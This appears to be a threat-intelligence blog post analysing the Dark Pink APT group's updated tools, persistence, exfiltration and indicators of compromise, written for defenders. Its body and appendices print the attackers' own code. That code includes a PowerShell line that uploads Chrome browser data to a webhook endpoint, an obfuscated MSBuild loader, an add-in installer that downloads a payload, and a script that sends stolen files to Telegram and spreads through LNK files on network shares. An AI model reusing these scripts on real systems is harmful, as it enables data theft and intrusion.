{ "id": "289ea252-413b-40a7-a898-5e706e2f193b", "created_at": "2026-04-06T00:11:09.391016Z", "updated_at": "2026-04-10T03:36:19.27735Z", "deleted_at": null, "sha1_hash": "06a5539bcd70e3a9fafa4e2dfd13b2df57305d4d", "title": "Latest techniques of the Dark Pink APT | Group-IB Blog", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 166571, "plain_text": "Andrey Polovinkin\r\nTeam Lead Reverse Research, APAC\r\nDark Pink. Episode 2\r\nAPT Dark Pink is back with 5 victims in new countries.\r\nMay 31, 2023 · min to read · Advanced Persistent Threats\r\n← Blog\r\nhttps://www.group-ib.com/blog/dark-pink-episode-2/\r\nPage 1 of 27\n\nAPT Dark Pink Threat Intelligence\r\nIn early January, the Group-IB Threat Intelligence unit published a detailed report which described\r\nthe techniques and tools used by a new APT (Advanced Persistent Threat) group codenamed Dark\r\nPink by Group-IB (also tracked under the name Saaiwc Group). The name Dark Pink was coined by\r\nforming a hybrid of some of the email addresses used by the threat actors during data exfiltration.\r\nThis threat actor has been operating since mid-2021, mainly in the Asia-Pacific region. The group\r\nuses a range of sophisticated custom tools, deploys multiple kill chains relying on spear-phishing\r\nemails. Once the attackers gain access to a target’s network, they use advanced persistence\r\nmechanisms to stay undetected and maintain control over the compromised system.\r\nAs we continued to track the group’s activity, we identified new tools, exfiltration mechanisms and\r\nvictims in new industries, in countries that Dark Pink has never targeted before.\r\nAs shown on the updated attack timeline below, overall, Group-IB’s Threat Intelligence identified 13\r\norganizations targeted by the group. Our previous analysis uncovered 8 attacks on entities based in\r\nthe Asia-Pacific region and 1 organization based in Europe, including one unsuccessful attack.\r\nAccording to the latest findings, 5 new victims have been identified by Group-IB, which suggests\r\nthat the actual scope of the attacks could be even broader. Dark Pink has continued to attack\r\ngovernment, military, and non-profit organizations in the Asia-Pacific expanding its operations to\r\nThailand and Brunei. Another victim, an educational sector organization, has also been identified in\r\nBelgium.\r\nIt is important to emphasize that Dark Pink has carried out at least two attacks since the\r\nbeginning of 2023. The most recent attack known to Group-IB started in April, with the latest files\r\nbeing detected in May. It means that the group shows no signs of slowing down.\r\nhttps://www.group-ib.com/blog/dark-pink-episode-2/\r\nPage 2 of 27\n\nIn line with Group-IB’s zero tolerance policy to cybercrime, we sent proactive warnings to all\r\nconfirmed and potential victims.\r\nTechnical indicators obtained during threat intelligence gathering activities suggest that Dark Pink\r\nkeeps updating their tools to slip undetected past defense mechanisms and remains highly active.\r\nIn this blog, the Group-IB team analyzes the latest updates in Dark Pink’s toolset, evolution of the\r\ngroup’s exfiltration methods, and modifications of their kill chain. The blog dives deep into the latest\r\nTTPs of Dark Pink, observed during the group’s latest attacks. CISOs, corporate cybersecurity\r\nteams, incident response specialists, threat intelligence experts will find the list of mitigation\r\nhttps://www.group-ib.com/blog/dark-pink-episode-2/\r\nPage 3 of 27\n\ntechniques as well as the latest indicators of compromise to better protect themselves against the\r\nactivity of Dark Pink.\r\nJoin the Cybercrime Fighters Club\r\nThe global fight against cybercrime is a collaborative\r\neffort, and that’s why we’re looking to partner with\r\nindustry peers to research emerging threats and publish\r\njoint findings on our blog. If you’ve discovered a\r\nbreakthrough into a particular threat actor or a\r\nvulnerability in a piece of software, let us know at blog@group-ib.com, and we can mobilize all our necessary resources to\r\ndive deeper into the issue. All contributions will be given\r\nappropriate credit along with the full backing of our social\r\nmedia team onGroup-IB’s Threat Intelligence Twitter page, where we\r\nregularly share our latest findings into threat actors’ TTPs\r\nand infrastructure, along with our other social media\r\naccounts.\r\nKey findings\r\nhttps://www.group-ib.com/blog/dark-pink-episode-2/\r\nPage 4 of 27\n\nDark Pink’s Modified Kill Chain\r\nOn May 17, 2023, a file named “[Update] Counterdraft on the MoU on Rice Trade.zip.iso” was\r\nuploaded to VirusTotal. This ISO image is typical for Dark Pink and contains several items including a\r\nsigned file, a decoy document, and a malicious DLL. The infection chain corresponds to the last\r\ninfection chain, as described in our previous report. The threat actor continues to use the MSBuild\r\nutility for launching KamiKakaBot (a tool designed to read and execute commands from a threat\r\nactor-controlled Telegram channel via Telegram bot) in the infection chain. The group has been\r\nusing tools with the same functionalities as in previous attacks. Most of the changes seem to be\r\nintended to impede static analyses.\r\nFive new victims of Dark Pink have been identified by Group-IB.\r\nDark Pink expanded its operations to Belgium, Brunei, and Thailand.\r\nThe group remains highly active with two successful attacks carried out since the beginning\r\nof 2023.\r\nDark Pink’s new account on GitHub has been discovered and analyzed by Group-IB\r\nresearchers.\r\nDark Pink leveraged the functionalities of an MS Excel add-in to ensure the persistence of\r\nTelePowerBot within the infected system.\r\nDark Pink keeps updating its existing toolset to remain undetected.\r\nIn a recent attack, Dark Pink exfiltrated stolen data over a HTTP protocol using a service called\r\nWebhook.\r\nDark Pink most likely uses different LOLBin techniques to evade detection on infected\r\nmachines.\r\nKamiKakaBot’s functionality has been split into two distinct parts: controlling devices and\r\nstealing sensitive data.\r\nIn addition to distributing payloads through GitHub, the threat actors used the service\r\nTextBin.net for the same purpose.\r\nhttps://www.group-ib.com/blog/dark-pink-episode-2/\r\nPage 5 of 27\n\nThe threat actors include an MS Word program inside the ISO image. The file has a “.docx”\r\nextension in its name and features the MS Word icon to trick the victim into thinking it is safe to\r\nopen. When the DLL file is launched through sideloading, the XML file that initiates the next stage of\r\nattack is decrypted from the decoy document and saved onto the infected computer. The XML file\r\nis located at the end of the file. The DLL file identifies the last zero byte and starts to decrypt it. The\r\ndecryption process results in an XML file that will be launched by MSBuild when the user logs into\r\nthe system.\r\nhttps://www.group-ib.com/blog/dark-pink-episode-2/\r\nPage 6 of 27\n\nIn the new version, KamiKakaBot’s functionality has been split into two distinct parts: controlling\r\ndevices and stealing sensitive data. As before, KamiKakaBot is loaded directly into the memory\r\nwithout being stored on the filesystem. The main part of KamiKakaBot has the same logic and has\r\nnot changed from the initially discovered version. We examined several different samples and in\r\nevery case the attackers added obfuscation to make static analyses more difficult.\r\nWhile analyzing different variants of KamiKakaBot, we noticed that the same functionality can be\r\nimplemented in different ways. For example, in the version of KamiKakaBot analyzed in our previous\r\nreport about the group, the ID of the last read message and the Telegram token were stored in\r\nregistry keys:\r\nhttps://www.group-ib.com/blog/dark-pink-episode-2/\r\nPage 7 of 27\n\nIn the latest version, however, both are now stored in files. Upon launching, a file named\r\n%TEMP%\\tmpTCD1-10dA-401B-A104.tmp is created, and it contains the string \u003cTG_TOKEN\u003e:\r\n\u003cMESSAGE_ID\u003e. This file is then updated whenever a message is read or if the threat actor decides\r\nto change the bot token. It is important to note that the filename is hardcoded inside the sample\r\nand can change in each case:\r\nThe table below contains examples of commands that KamiKakaBot can receive from the attackers.\r\nThe third column shows commands from the first discovered KamiKakaBot. Column number five\r\nlists commands from the last sample.\r\n# Description Different variation of KamiKakaBot’s command\r\n1\r\nSteal data from\r\nweb browser\r\nCMD_BROWS GETBRWS 34\r\n2 Update XML file CMD_UPDATEXML XMLNEW 45\r\n3\r\nUpdate telegram\r\ntoken\r\nCMD_UPDATETOKEN TOKENNEW 91\r\n4\r\nSend bot/victim\r\nidentifier\r\nSH0WUP 1*\r\n5\r\nDownload and\r\nexecute arbitrary\r\nscript\r\n4869%URL% (4869 sequence is the “Hi” character in hex\r\nrepresentation. If file download is successful, return 4869d\r\n(Hi\\x0d), otherwise 4869e(Hi\\x0e))\r\nhttps://www.group-ib.com/blog/dark-pink-episode-2/\r\nPage 8 of 27\n\n6 Execute command in cmd.exe\r\nWhile executing MSBuild, an additional module is created on the infected system. Its name follows a\r\nrandom pattern generated as [1-9]{4}-[1-9]{4}-[1-9]{4}-[1-9]{4}. The module is saved in the %TMP%\r\ndirectory of the infected system. The module is loaded and deleted while KamiKakaBot.Main is\r\nlaunched.\r\nThe collection process has not changed since the previous version. It involves compiling a list of\r\nfiles from web browsers such as Mozilla Firefox, Google Chrome, and MS Edge. Each file is then\r\ncopied to a designated folder. Finally, a ZIP archive is created with a randomly generated name by\r\nKamiKaka.Main according to the pattern [1-9]{6}-[1-9]{5}-[1-9]{5}-[1-9]{4}.tmp. In the case of Google\r\nChrome and MS Edge, the key to decrypt encrypted logins and passwords is extracted and added\r\nto the archive. The list of collected files is shown below:\r\nMozilla Firefox Google Chrome/MS Edge\r\nkey4.db\r\nkey3.db\r\ncookies.sqlite\r\nlogins.json\r\nautofill-profiles.json\r\nLogin Data\\\r\nLogin Data For Account\\\r\nCookies\\\r\nPersistence and lateral movement\r\nWhile researching for our previous blog post, we discovered only one GitHub account used during\r\nall the attacks, which suggests that Dark Pink may have remained undetected for a long time.\r\nMalware initialized by the threat actors can issue commands for an infected machine to download\r\nmodules from the GitHub account. While analyzing this threat, we discovered a new Dark Pink\r\naccount on GitHub (hXXps://github[.]com/peterlyly). The first commit is dated Jan. 9th, 2023. This\r\nis the day when the first notion about this group was available in the public domain:\r\nhttps://www.group-ib.com/blog/dark-pink-episode-2/\r\nPage 9 of 27\n\nDark Pink has hidden the repository. What makes the move noteworthy is that the repository was\r\ndeactivated when the URLs pointing to files within the repositories were being uploaded to\r\nVirusTotal:\r\nDark Pink rarely performs commits on GitHub. Overall, 12 commits were performed between January\r\n9 and April 11, 2023. They contain powershell scripts, zip archives, and custom malware as in\r\nprevious attacks. A few files such as ZMsg and Netlua have already been analyzed by Group-IB\r\nThreat Intelligence. The tool ZMsg was designed to steal information from Zalo, an instant\r\nmessenger. Dark Pink uses Netlua to elevate privileges and launch powershell commands. More\r\ndetails can be found in our previous blog post. The zip archive contains tree files: the encrypted\r\npayload, the signed executable, and the loader.\r\nhttps://www.group-ib.com/blog/dark-pink-episode-2/\r\nPage 10 of 27\n\nFirst, the threat actors update scripts used to infect new devices. Yet the script was not updated\r\ncorrectly, most likely due to haste, and the payload was downloaded from the old GitHub account.\r\nFor this reason, the file bbb.gif was uploaded twice. This PowerShell script combines exfiltrating files\r\nand infecting files on common network resources. The first part of the script sorts files in the\r\n%APPDATA%\\Roaming\\Microsoft\\Windows\\Recent directory. The Recent directory contains\r\nshortcuts to last used files on the system for this reason the script retrieves original file path firstly,\r\nthen filtering files based on their last write time and file extension. For each file that meets the\r\ncriteria, the script copies it to the temp directory, compresses it and sends it to a specific chat by\r\nTelegram API. Finally, the copies of the original file in the temp folder will be deleted. The second\r\npart retrieves a list of SMB shares, downloads the zip archive from GitHub, and saves it to the local\r\ndirectory. Then, instead of creating original files on storage, the script creates LNK files with a\r\ncommand to launch a malicious executable from the archive. The infection mechanism of new\r\ndevices has not been changed from the previous:\r\nhttps://www.group-ib.com/blog/dark-pink-episode-2/\r\nPage 11 of 27\n\nWe have already discussed this part in our previous blog post about relating to Dark Pink. A full\r\nversion of the script can be found in the appendix section.\r\nAs we have already noted, Dark Pink uses spear-phishing to gain initial access, installs self-developed malware TelePowerBot and KamiKakaBot, both of which leverage Telegram bot’s\r\nfunctionality for communication with the threat actor. The droppers of communication modules\r\n(TelePowerDropper/KamiKakaDropper) were designed to be launched once to persist\r\ncommunication modules on infected machines. The main disadvantage of this way is that the\r\nattackers can lose control if TelePowerBot or KamiKakaBot are discovered. For this reason, the\r\nthreat actors developed a special module to check whether the TelePowerBot has gained\r\npersistence.\r\nInstead of checking the bots every time that a device is turned on, checks are carried out only\r\nwhen certain conditions are met. The method is not new and was widely discussed. The\r\nfunctionality was designed as a Microsoft Excel add-in library. An MS Excel add-in extends its\r\nfunctionality by providing custom functions, macros, or tools. In this case, the function xlAutoOpen\r\nwas overridden to start malicious activity every time that Excel was started. During the infection, the\r\nthreat actor executes a simple PowerShell script to download add-ins from GitHub to the Excel\r\nstartup directory (%APPDATA%\\Microsoft\\Excel\\XLSTART) on the infected device. The XLL files\r\nare delivered and placed in the directory using a simple PowerShell script – see the appendix\r\nsection.\r\nAll strings in binaries are encrypted using a simple XOR algorithm, but a key will be formed from the\r\nargument relating to the launching process. This simple trick would help to avoid detection if\r\nhttps://www.group-ib.com/blog/dark-pink-episode-2/\r\nPage 12 of 27\n\nsomebody tried to upload this file to a sandbox or performed a static analysis. The key is calculated\r\nbased on two arguments. The first part of the key is the name of the launched process: excel.exe.\r\nA final part of the key is the extension of the opening file in Excel, which should be .xlsx. If all\r\nconditions are met, the strings will be decrypted correctly.\r\nIt is worth noting that the same archive with an Excel add-in was available in the old GitHub\r\naccount too (hXXps://raw.githubusercontent[.]com/efimovah/abcd/main/ccc.gif). We observed that\r\nin addition to distributing payloads through GitHub, the threat actors used the service TextBin.net\r\nfor the same purpose. TextBin.net is an online platform where users can store and share text-based\r\ninformation. By simply changing the URL to the payload, threat actors can maintain their anonymity\r\nwhile delivering malware. We identified two direct links used for downloading TelePowerBot. These\r\nTelePowerBot’s variants do not contain a hardcoded token. They retrieve the Telegram token from\r\nregistry keys, which enables the threat actors to access and control the bots’ functionalities.\r\nData exfiltration\r\nDark Pink used various methods and services to exfiltrate stolen data. Information from stealers was\r\nsent to a Telegram chat in a zip archive. In the past we have seen data be exfiltrated using email or\r\npublicly available cloud services such as DropBox. In a recent attack, Dark Pink exfiltrated stolen\r\ndata over a HTTP protocol using a service called Webhook. Webhook.site is a powerful and\r\nversatile service that allows users to easily inspect, test, and debug HTTP requests and webhooks.\r\nWith webhook.site, it is possible to set up temporary endpoints in order to capture and view\r\nhttps://www.group-ib.com/blog/dark-pink-episode-2/\r\nPage 13 of 27\n\nincoming HTTP requests. The threat actor created temporary endpoints and sent sensitive data\r\nstolen from victims using the simple command below:\r\n$ui='hXXps://webhook[.]site/288a834b-fd92-4531-82a5-b41e907daa56';\r\n$dt=$env:userprofile+'\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Web\r\n(New-Object System.Net.WebClient).UploadFile($ui,$dt);\r\nFurthermore, Dark Pink has been seen to replace the Webhook service with a Windows server. The\r\nmotive behind this change remains unclear given that in the past Dark Pink has usually favored\r\npublic free-to-use services. It is worth noting that the script mentioned earlier also involves creating\r\na new WebClient object, defining a file path, and subsequently uploading the file to the designated\r\nURL using the PUT method.\r\nThe IP address of the aforementioned Dark Pink’s Windows server is 176.10.80[.]38. As shown by\r\nGroup-IB’s proprietary Graph Network Analysis tool, the IP address had multiple connections\r\nwith various entities at different points in time, including Meterpreter:\r\nhttps://www.group-ib.com/blog/dark-pink-episode-2/\r\nPage 14 of 27\n\nThis may indicate that Dark Pink could also be employing widely used instruments in their attacks in\r\naddition to their custom toolset.\r\nReconnaissance\r\nWe have identified multiple instances when Dark Pink used unconventional methods, which is not\r\nunusual for the group. For instance, when launching the TelePowerBot, they modified the default\r\nfile association and used SyncAppvPublishingServer.vbs to initiate TelePowerBot. As regards the\r\nprocess of downloading archives, the files are downloaded using the ConfigSecurityPolicy utility,\r\na component of Windows Defender used for managing settings and facilitating file transfers. In the\r\ncase of downloads, the files can be found in the cache folder at\r\nhttps://www.group-ib.com/blog/dark-pink-episode-2/\r\nPage 15 of 27\n\n%LOCALAPPDATA%\\Microsoft\\Windows\\INetCache\\IE. Refer to the provided commands on lines\r\n36 and 37 for an example.\r\nDuring the reconnaissance stage, Dark Pink executed simple PowerShell commands, presumably to\r\ncheck whether specific files could be found on the infected device. The executed commands are\r\nlisted below:\r\ngi \"C:\\Program Files (x86)\\Windows Kits\\10\\bin\\*\\*\\AccChecker\\AccCheckConsole.exe\"\r\ngi \"C:\\Program Files (x86)\\Windows Kits\\10\\Debuggers\\*\\remote.exe\"\r\ngi \"C:\\Program Files *\\Internet Explorer\\Extexport.exe\"\r\ngi \"C:\\Program Files*\\Microsoft Office\\*\\MSPUB.exe\",\r\ngi \"C:\\Program Files*\\Microsoft Office\\Office*\\MSOHTMED.exe\"\r\ngi \"C:\\Program Files\\dotnet\\dotnet.exe\"\r\ngi \"C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\*\\bin\\Pester.bat\"\r\ngi \"C:\\Windows\\diagnostics\\system\\WindowsUpdate\\CL_Invocation.ps1\"\r\ngi \"C:\\Windows\\Microsoft.NET\\Framework*\\*\\ilasm.exe\"\r\ngi \"C:\\Windows\\WinSxS\\amd64_*\\Runscripthelper.exe\"\r\nAlthough specific examples of these tools being used have not been discovered, based on our\r\nresearch into and experience with Dark Pink, we believe that all of these tools can be used for proxy\r\nexecution or downloading malicious payloads. The table below explains how the cybercriminals can\r\nuse these tools on infected devices:\r\nProgram name Possible uses Examples\r\nAccCheckConsole.exe\r\nLoads a managed DLL\r\nin the context of\r\nAccCheckConsole.exe\r\nhttps://lolbas-project.github.io/lolbas/OtherMSBinaries/AccChe\r\nremote.exe\r\nExecutes a process\r\nunder a trusted\r\nMicrosoft signed\r\nbinary\r\nhttps://lolbas-project.github.io/lolbas/OtherMSBinaries/Remote\r\nhttps://www.group-ib.com/blog/dark-pink-episode-2/\r\nPage 16 of 27\n\nExtexport.exe Executes DLL files https://lolbas-project.github.io/lolbas/Binaries/Ext\r\nMSPUB.exe\r\nDownloads payloads\r\nfrom remote servers\r\nhttps://lolbas-project.github.io/lolbas/OtherMSBinaries/Mspub/\r\nMSOHTMED.exe\r\nDownloads payloads\r\nfrom remote servers\r\nhttps://lolbas-project.github.io/lolbas/OtherMSBinaries/MsoHtm\r\nConclusion\r\nOur most recent analysis of the group’s operations uncovered that Dark Pink attacked 13\r\norganizations, five of which were new victims. Furthermore, the geographic distribution of the\r\ntargeted organizations is worth noting. Although most attacks occurred in the Asia-Pacific region,\r\ntwo organizations based in Europe were also on the victim list, which means that the threat actor’s\r\ngeography could be broader than initially thought.\r\nThe fact that two attacks were executed in 2023 indicates that Dark Pink remains active and poses\r\nan ongoing risk to organizations. Evidence shows that the cybercriminals behind these attacks keep\r\nupdating their existing tools in order to remain undetected.\r\nAll of the above means that all organizations must always be watchful and take proactive steps to\r\nprotect themselves. Keeping up with the latest threats and regularly updating security tools and\r\nmeasures is essential.\r\nRecommendations\r\nUse modern email protection measures to prevent initial compromise through spear-phishing\r\nemails. We recommend Group-IB Business Email Protection, which counters such threats\r\neffectively.\r\nFoster a strong cybersecurity culture in your workplace, including training staff to identify\r\nphishing emails.\r\nhttps://www.group-ib.com/blog/dark-pink-episode-2/\r\nPage 17 of 27\n\nIndicators of compromise\r\nBelow, you will find a list of indicators of compromise linked to the recent activities associated with\r\nDark Pink. The list has been collected by the Group-IB Threat Intelligence unit. We’ll be publishing\r\nnewly discovered IOCs in Group-IB’s Threat Intelligence Twitter account. If you would like to\r\ncontribute to our blog with the indicators related to Dark Pink, shoot us an email at blog@group-ib.com.\r\nFile:\r\n[Update]\r\nCounterdraft on\r\nthe MoU on Rice\r\nTrade.zip.iso\r\n6b7c4ce5419e7cde80856a85559203dca5219d05115cdd6c1598f2e789149c34\r\nwwlib.dll 8dc3f6179120f03fd6cb2299dbc94425451d84d6852b801a313a39e9df5d9b1a\r\n~[INDONESIA]\r\nCOUNTERDRAFT\r\nMOU ON RICE\r\nTRADE\r\nINDONESIA-INDIA\r\n15052023.DOC\r\n78ec064bce850d0e0a022cdbb84a6200e62f92e8e575ebbd4a9b764dc1dce771\r\nMS Project file 54675c16c1fd97227cb41892431e1f9f8b0b153225b5576445d3ba24860dcfd9\r\nEnsure that your security measures allow for proactive threat hunting in order to identify threats\r\nthat cannot be detected automatically.\r\nLimit access to file-sharing resources, except those used within the organization.\r\nMonitor LNK files being created in unusual locations, such as network drives and USB devices.\r\nObserve any use of commands and built-in tools that are frequently used for collecting\r\ninformation about the system and files.\r\nDevelop command line usage benchmarks for commonly used LOLBin techniques to uncover\r\npossible malicious activities.\r\nImplement a monitoring system to detect any images mounted in the system, thereby\r\nproactively protecting against infections and identifying potential malicious activities.\r\nKeeping your organization secure requires ongoing vigilance. Using a proprietary solution such\r\nas Group-IB Threat Intelligence can help shore up your security posture by equipping your\r\nsecurity teams with the latest insights into new and emerging threats.\r\nhttps://www.group-ib.com/blog/dark-pink-episode-2/\r\nPage 18 of 27\n\nccc.gif 115a66aba1068be11e549c4194dda5f338684ae37ffbfc9045c0bae488a5acf4\r\nAccHelperxll 6d620e86fd37c9b92a0485b0472cb1b8e2b1662fbb298c4057f8d12ad42808b4\r\nRegedit path:\r\nURLs:\r\nMITRE ATT\u0026CK\r\nHKCU:\\Environment\\PSH\r\nHKCU:\\Environment\\SYSB\r\nHKCU:\\Environment\\TPM\r\nhXXps://webhook[.]site/288a834b-fd92-4531-82a5-b41e907daa56\r\nhXXps://webhook[.]site/2b733e31-70bb-4777-be4a-41a98f3559bf\r\nhXXp://raw.githubusercontent[.]com/peterlyly/zxcv/main/xxx.gif\r\nhXXp://raw.githubusercontent[.]com/peterlyly/zxcv/main/ccc.gif\r\nhXXp://raw.githubusercontent[.]com/peterlyly/zxcv/main/DDDD.gif\r\nhXXp://raw.githubusercontent[.]com/peterlyly/zxcv/main/eeeee.gif\r\nhXXps://raw.githubusercontent[.]com/peterlyly/zxcv/main/eeeee.gif\r\nhXXps://raw.githubusercontent[.]com/peterlyly/zxcv/main/xxx.gif\r\nhXXps://raw.githubusercontent[.]com/peterlyly/zxcv/main/eee.gif\r\nhXXps://raw.githubusercontent[.]com/peterlyly/zxcv/main/ccc.gif\r\nhXXps://raw.githubusercontent[.]com/peterlyly/zxcv/main/bbb.gif\r\nhXXps://textbin[.]net/raw/1tmfbi0bep\r\nhXXps://textbin[.]net/raw/d7hs6e68ox\r\nhXXp://176.10.80[.]38:8843/upload\r\nhXXp://176.10.80[.]38:8843/11.msi\r\nhXXp://176.10.80[.]38:8843/1.zip\r\n®\r\nhttps://www.group-ib.com/blog/dark-pink-episode-2/\r\nPage 19 of 27\n\nTactic Mitre ID Technique\ninitial-access T1091 Replication Through Removable Media\nT1566.002 [Phishing-\u003eSpearphishing Link]\nexecution T1204.002 [User Execution-\u003eMalicious File]\nT1059.001 [Command and Scripting Interpreter-\u003ePowerShell]\nT1053.005 [Scheduled Task/Job-\u003eScheduled Task]\nT1059.005 [Command and Scripting Interpreter-\u003eVisual Basic]\nT1059.003 [Command and Scripting Interpreter-\u003eWindows Command Shel\npersistence T1574 002 [Hijack Execution Flow-\u003eDLL Side-Loading]\nAPPENDIX A. Example of new XML file\nhttps://www.group-ib.com/blog/dark-pink-episode-2/\nPage 20 of 27\n\n`\n \u003c![CDATA[\n using System;\n using System.Reflection;\n using Microsoft.Build.Framework;\n using Microsoft.Build.Utilities;\n using System.IO;\n using System.IO.Compression;\n using System.Text;\n\npublic class Office_runtime : Microsoft.Build.Utilities.Task, ITask\n {\n public static byte[] AamlYlJd_vm_;\n public static byte[] YjE_c_oZzFdhBaW;\n public static byte[] xt__RzP_rEFQ_ = new byte[] {REDACTED};\n public static string WlJbbGOGij = \"REDACTED\"\n public static byte[] KQISfIU_Xy_ = new byte[] {104, 249, 1, 152, 206, 213};\n public override bool Execute()\n {\n for (int i = 0; i \u003c 100;i++)\n if ( i % 5==4)\n {\n break;\n }\n else if (i % 5==0)\n {\n AamlYlJd_vm_ = Convert.FromBase64String(WlJbbGOGij);\n for (int j = 0;j \u003c AamlYlJd_vm_.Length; j++)\n AamlYlJd_vm_[j] = (byte)(AamlYlJd_vm_[j] ^ KQISfIU_Xy_[j % KQISfIU_Xy_.Len\n Kanjdj1();\n } else {\n j1hndf1();\n YjE_c_oZzFdhBaW= new byte[]{54,50,51,50,50,48,52,49,54,53};\n };\n\nreturn true;\nhttps://www.group-ib.com/blog/dark-pink-episode-2/\nPage 21 of 27`\n\n}\r\n public static int Kanjdj1()\r\n {\r\n int zz=11;\r\n int yasd=22;\r\n return zz+ yasd;\r\n }\r\n public static int j1hndf1()\r\n {\r\n int x = 1;\r\n int y = 2;\r\n return x + y;\r\n }\r\n public static string GenRandName()\r\n {\r\n string s = \"\";\r\n var rd = new Random();\r\n for (int i = 0; i \u003c 16; i++)\r\n {\r\n if (i%4==0 \u0026\u0026 i \u003e 0)\r\n s=s+'-';\r\n s = s + rd.Next(1, 9).ToString();\r\n }\r\n return s;\r\n }\r\n public static string init_br()\r\n {\r\n for (int i = 0 ;i \u003c xt__RzP_rEFQ_.Length;i++)\r\n {\r\n xt__RzP_rEFQ_[i] = (byte)(xt__RzP_rEFQ_[i] ^ KQISfIU_Xy_[i % KQISfIU_Xy_.L\r\n }\r\n string _br_dl = GenRandName() + \".tmp\";\r\n _br_dl = Environment.ExpandEnvironmentVariables(String.Format(@\"%TMP%\\\\{0}\r\n if (File.Exists(_br_dl))\r\n File.Delete(_br_dl);\r\n File.WriteAllBytes(_br_dl,xt__RzP_rEFQ_);\r\n File.SetAttributes(_br_dl,FileAttributes.Hidden);\r\n return _br_dl;\r\n }\r\n public static void _akqnadRnf()\r\n {\r\nhttps://www.group-ib.com/blog/dark-pink-episode-2/\r\nPage 22 of 27\n\nj1hndf1();\r\n Kanjdj1();\r\n string ksddNvLr_ukEw = init_br();\r\n string jt_tzcoQYash_ = Encoding.Default.GetString(YjE_c_oZzFdhBaW);\r\n var inputStream = new MemoryStream(AamlYlJd_vm_);\r\n ZipArchive archive = new ZipArchive(inputStream, ZipArchiveMode.Read);\r\n ZipArchiveEntry archEntry = archive.Entries[0];\r\n Stream entryStream = archEntry.Open();\r\n var tmpMem = new MemoryStream();\r\n entryStream.CopyTo(tmpMem);\r\n var xtmp = tmpMem.ToArray();\r\n var ytld = Assembly.Load(xtmp);\r\n \r\n byte[] vfrr = Convert.FromBase64String(\"REDACTED\");\r\n foreach (Type type in ytld.GetExportedTypes())\r\n {\r\n try\r\n {\r\n var c = Activator.CreateInstance(type);\r\n type.InvokeMember(\"6gelkCas8K\", BindingFlags.InvokeMethod, null, c\r\n }\r\n catch { continue; }\r\n }\r\n }\r\n }\r\n]]\u003e\r\nAPPENDIX B. Example of a script to install add-ins\r\nscriptblock = {\r\n$uri = \"hXXps://raw.githubusercontent[.]com/peterlyly/zxcv/main/ccc.gif\";\r\nstart \"C:\\\\Program Files\\\\Windows Defender\\\\ConfigSecurityPolicy.exe\" -ArgumentLis\r\n$file = (gi \"$env:localappdata\\\\Microsoft\\\\Windows\\\\INetCache\\\\IE\\\\*\\\\ccc*.gif\" -f\r\nexpand $file \"$env:tmp\\\\ccc.zip\";sleep 10;rm $file -force\r\nExpand-Archive -Path \"$env:temp\\\\ccc.zip\" -DestinationPath \"$env:temp\" -force\r\nni \"$env:appdata\\\\Microsoft\\\\Excel\\\\XLSTART\" -ItemType Directory\r\nreplace \"$env:temp\\\\ccc\\\\ANALYS32.xll\" \"$env:appdata\\\\Microsoft\\\\Excel\\\\XLSTART\" /\r\nhttps://www.group-ib.com/blog/dark-pink-episode-2/\r\nPage 23 of 27\n\nreplace \"$env:temp\\\\ccc\\\\AccHelper.xll\" \"$env:appdata\\\\Microsoft\\\\Excel\\\\XLSTART\"\r\n};Start-Job $scriptblock\",\r\nAPPENDIX C. Example of a bbb.gif file\r\n$reg=\"HKCU:\\Environment\";\r\n$token,$chat_id=(gp $reg -name GUID2).GUID2 -split \"::\"\r\n$time=get-date -date ((gp $reg -name TIME).TIME);\r\ngi $env:APPDATA\\M*\\W*\\R*\\*|sort LastWriteTime|?{$_.FullName -like \"*.lnk\" -and $_.LastWrit\r\n$tp = (New-Object -comObject WScript.Shell).CreateShortcut($_.FullName).TargetPath\r\nif((\"\" -ne $tp) -and (Test-Path $tp -PathType Leaf) -and ($tp -notlike \"*.exe\")){\r\n $file = $tp;\r\n $ascii = [System.Text.Encoding]::ascii;\r\n $file=$ascii.getstring($ascii.getbytes(\"$($env:COMPUTERNAME)_$($file)\")) -replace\r\n cp -path $tp -Destination \"$env:temp\\$file\"\r\n Compress-Archive -Path \"$env:temp\\$file\" -Destination \"$env:temp\\$file.zip\" -Force\r\n Add-Type -AssemblyName System.Net.Http\r\n $form = new-object System.Net.Http.MultipartFormDataContent\r\n $form.Add($(New-Object System.Net.Http.StringContent $Chat_ID), 'chat_id')\r\n $Content = [System.IO.File]::ReadAllBytes(\"$env:temp\\$file.zip\")\r\n $byte = New-Object System.Net.Http.ByteArrayContent ($Content, 0, $Content.Length)\r\n $byte.Headers.Add('Content-Type','text/plain')\r\n $form.Add($byte, 'document', \"$file.zip\")\r\n $ms = new-object System.IO.MemoryStream\r\n $form.CopyToAsync($ms).Wait()\r\n try {irm -Method Post -Body $ms.ToArray() -Uri \"https://api.telegram.org/bot$token\r\n catch {Start-Sleep 30;irm -Method Post -Body $ms.ToArray() -Uri \"https://api.teleg\r\n $time = $_.LastWriteTime\r\n sp -Path $reg -Name \"Time\" -Value $time.tostring('yyyy-MM-dd HH:mm:ss') -Force\r\n rm \"$env:temp\\$file\" -Force -Recurse\r\n rm \"$env:temp\\$file.zip\" -Force -Recurse\r\n}\r\n}\r\n$list_paths = @()\r\n$list_paths += (get-smbshare|?{($_.Description -notin (\"Default share\",\"Remote IPC\",\"Print\r\n$list_paths += (Get-SMBMapping|?{$_.Status -eq \"OK\"})|%{if($_){$_.path}}\r\n$list_paths += gi $env:APPDATA\\M*\\W*\\R*\\*|?{$_.FullName -like \"*.lnk\"}|%{(New-Object -comO\r\nif($list_paths.count -ne 0){\r\ntry{Expand-Archive -Path \"$env:temp\\xxx.zip\" -DestinationPath \"$env:temp\" -force}catch{\r\n$uri = \"https://github.com/peterlyly/zxcv/raw/main/xxx.gif\";\r\nstart \"C:\\Program Files\\Windows Defender\\ConfigSecurityPolicy.exe\" -ArgumentList $\r\n$file = (gi \"$env:localappdata\\Microsoft\\Windows\\INetCache\\IE\\*\\xxx*.gif\" -force)\r\nhttps://www.group-ib.com/blog/dark-pink-episode-2/\r\nPage 24 of 27\n\nexpand $file \"$env:tmp\\xxx.zip\";sleep 10;rm $file -force\r\nExpand-Archive -Path \"$env:temp\\xxx.zip\" -DestinationPath \"$env:temp\" -force\r\n}\r\n$list_paths = $list_paths |%{(gci $_ -Recurse -Directory -Force|?{$_.name -notin 